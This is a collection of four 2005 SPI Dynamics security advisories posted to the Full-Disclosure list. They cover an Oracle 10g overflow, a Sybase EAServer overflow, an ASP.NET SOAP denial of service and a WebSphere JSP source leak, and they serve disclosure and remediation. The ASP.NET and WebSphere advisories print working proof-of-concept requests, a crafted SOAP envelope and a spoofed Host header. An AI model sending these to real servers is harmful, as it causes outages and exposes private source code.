[Full-disclosure] Oracle 10g - emagent.exe Stack-Based Overflow
Oracle 10g - emagent.exe Stack-Based Overflow http://www.spidynamics.com/spilabs/advisories/oracle-emagentoverflow.htm l Release Date: October 18, 2005 Severity: Critical Systems Affected For a complete list of products and components affected, please visit http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html Description --- A vulnerability has been discovered in Oracle Application Server 10g (10.1.2) on Windows 2000 Server and others (see list above). If exploited, this can result in user-specified code being executed under the security context of the Oracleoracleas1ASControl service - \\NT Authority\SYSTEM by default. Remediation --- The issue can be resolved by applying the patches provided by October 2005 Oracle Critical Patch Update available from http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html. Vendor Information -- Oracle was contacted on March 7, 2005. For more information about this advisory please visit Oracle Critical Patch Update page http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html. Contact Information [EMAIL PROTECTED] SPI Dynamics, Inc. 115 Perimeter Center Place N.E. suite 1100 Atlanta, GA. 30346 Toll-Free Phone: (866) 774-2700 SPI Dynamics was founded in 2000 by a team of accomplished Web security specialists; SPI Dynamics is the leader in Web application security technology. With such signature products as WebInspect, SPI Dynamics is dedicated to protecting companies' most valuable assets. SPI Dynamics has created a new breed of Internet security products for the Web application, the most vulnerable yet least secure component of online business infrastructure. Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2
Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2 --- Release Date: July 15 2005 Severity: Medium A vulnerability has been discovered in Sybase EAServer. If exploited, this can result in user-specified code being executed under the security context of the jagsrv.exe process. To complete this attack, you must be authenticated to /WebConsole/. By default, the jagadmin user password is set to blank so getting access might be trivial. After authenticating to /WebConsole/ if an attacker sets the value of the JavaScript parameter in TreeAction.do to a large value a return address can be overwritten due to a stack-based buffer overflow. For more information about this advisory, please visit our advisory page located at http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm [Remediation] For a complete list of version affected and patch required, please visit the complete advisory page http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm Vendor Information: Sybase was contacted on 05/05/2005. For more information about this advisory Please visited Sybase alert page http://www.sybase.com/detail?id=1036742 Contact Information [EMAIL PROTECTED] SPI Dynamics, Inc. 115 Perimeter Center Place N.E. suite 1100 Atlanta, GA. 30346 Toll-Free Phone: (866) 774-2700 SPI Dynamics was founded in 2000 by a team of accomplished Web security specialists; SPI Dynamics is the leader in Web application security technology. With such signature products as WebInspect, SPI Dynamics is dedicated to protecting companies' most valuable assets. SPI Dynamics has created a new breed of Internet security products for the Web application, the most vulnerable yet least secure component of online business infrastructure. Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASP.NET RCP/Encoded Web service DOS
ASP.NET RCP/Encoded Web service DOS
http://www.spidynamics.com/spilabs/advisories/aspRCP.html
Release Date: July 11, 2005
Severity: High
[System Affected]
* IIS Servers exposing ASP.NET Web services that consume arrays in
RCP/Encoded mode
* Applications using System.Xml.Serialization to consume untrusted data
in RCP/Encoded mode
[Description]
We have found that by sending a custom SOAP message to an RCP/Encoded
web method which accepts an array (or any object derived from IList,
like StringCollection or ArrayList), we can cause the aspnet_wp.exe
process to consume 100% of the system resources. More than one request
may be required to create this condition on faster systems.
To replicate the issue, we can send a request to the Test(int[]
someList) web method defined inside the AspCrashWebService project
(refer to AspCrashWebService.zip distributed with this document). A
normal SOAP message to call this method with a single element of 0 would
look like:
?xml version=1.0 encoding=utf-16?
soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/;
xmlns:soapenc=http://schemas.xmlsoap.org/soap/encoding/;
xmlns:tns=http://tempuri.org/;
xmlns:types=http://tempuri.org/encodedTypes;
xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd=http://www.w3.org/2001/XMLSchema;
soap:Body
soap:encodingStyle=http://schemas.xmlsoap.org/soap/encoding/;
tns:Test
someList href=#id1 /
/tns:Test
soapenc:Array id=id1 soapenc:arrayType=xsd:int[1]
Item0/Item
/soapenc:Array
/soap:Body
/soap:Envelope
If we change the soapenc:Array definition with the complex type
defined in our demo ASPCrashWebService.Service1 WSDL definition
(ArrayOfInt), we will cause the problem in aspnet_wp.exe.
Our new request would look like:
?xml version=1.0 encoding=utf-16?
soap:Envelope xmlns:soap=http://schemas.xmlsoap.org/soap/envelope/;
xmlns:soapenc=http://schemas.xmlsoap.org/soap/encoding/;
xmlns:tns=http://tempuri.org/;
xmlns:types=http://tempuri.org/encodedTypes;
xmlns:xsi=http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd=http://www.w3.org/2001/XMLSchema;
soap:Body
soap:encodingStyle=http://schemas.xmlsoap.org/soap/encoding/;
tns:Test
someList href=#id1 /
/tns:Test
tns:ArrayOfInt
Item0/Item
/tns:ArrayOfint
/soap:Body
/soap:Envelope
We have found that the error is caused by an infinite loop inside
System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElemen
ts (). The method can be translated to the following code:
protected void ReadReferencedElements()
{
string V_0;
r.MoveToContent();
while (r.NodeType != XmlNodeType.EndElement r.NodeType !=
XmlNodeType.None)
{
ReadReferencingElement(null, null, true, out V_0);
r.MoveToContent();
}
DoFixups();
HandleUnreferencedObjects();
}
The problem is that after the call to ReadRefencingElement() the
r.NodeType is set to XmlNodeType.Element and the while loop never
terminates.
[Remediation]
RCP/Encoded web services are not recommended by Microsoft. Developers
should utilize document/literal instead, which is not affected by this
issue. The Microsoft Security Response Center has stated that this issue
will be addressed in the upcoming Whidbey release of Web Services. In
the interim, the aspnet_wp.exe service can be restarted and operation
will resume without problems.
[Credit]
Discovery: Bryan Sullivan
Research: Sacha Faust
Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700
SPI Dynamics was founded in 2000 by a team of accomplished Web security
specialists; SPI Dynamics is the leader in Web application security
technology. With such signature products as WebInspect, SPI Dynamics is
dedicated to protecting companies' most valuable assets. SPI Dynamics
has created a new breed of Internet security products for the Web
application, the most vulnerable yet least secure component of online
business infrastructure.
Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IBM WebSphere Widespread configuration JSP disclosure
IBM WebSphere Widespread configuration JSP disclosure Release Date: 04/13/2005 Severity: High [Systems Affected] * IBM WebSphere Application 6 and prior. [Description] The practice of sharing the document root of the app server within the document root of the web server creates a security exposure that can result in the jsp source being served up as plain text by the web server. The plug-in has a set of rules used to determine whether a given request will be handled by the app server. When an incoming request fails to match those rules, the plug-in returns control to the web server so that the web server can fulfill the request. In this case, the unknown host header causes the plug-in to return control to the web server because the rules don't indicate the app server should handle it. Therefore, the web server looks for the request in the web server document root. Since the jsp source is stored in the document root of the web server the web server finds the file and serves it as plain text. The following is a demonstration on how to replicate the issue. HTTP request sent - GET /index.jsp HTTP/1.0 Host: NonExistentHost HTTP response received -- HTTP/1.1 200 OK Via: HTTP/1.1 websphereserver (IBM-PROXY) Date: Wed, 09 Mar 2005 21:39:43 GMT Server: IBM_HTTP_Server/1.3.12.6 Apache/1.3.12 (Unix) Last-Modified: Tue, 01 Mar 2005 18:35:02 GMT ETag: 515e0007-1d72-4224b5d6 Accept-Ranges: bytes Content-Length: 7538 Content-Type: text/plain %@ include file=/main/inc/alt-header-0.inc % %@ include file=includes/tabincv4.jsp % %@ include file=includes/tactic.jsp % %=headerjs% jsp:include page=%=tabhdrinc % flush=true/ [Remediation] To eliminate this exposure, you should move the app server jsp source outside of the web server document root. Then, when this request comes in with the unknown host header the plug-in will return control to the web server and the web server will fail to find the file in the document root. Therefore, the web server will return 404 File Not Found rather than the jsp source. [Vendor Information] The vendor was contacted repeatedly without any conclusive results. Contact Information [EMAIL PROTECTED] SPI Dynamics, Inc. 115 Perimeter Center Place N.E. suite 1100 Atlanta, GA. 30346 Toll-Free Phone: (866) 774-2700 SPI Dynamics was founded in 2000 by a team of accomplished Web security specialists; SPI Dynamics is the leader in Web application security technology. With such signature products as WebInspect, SPI Dynamics is dedicated to protecting companies' most valuable assets. SPI Dynamics has created a new breed of Internet security products for the Web application, the most vulnerable yet least secure component of online business infrastructure. Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
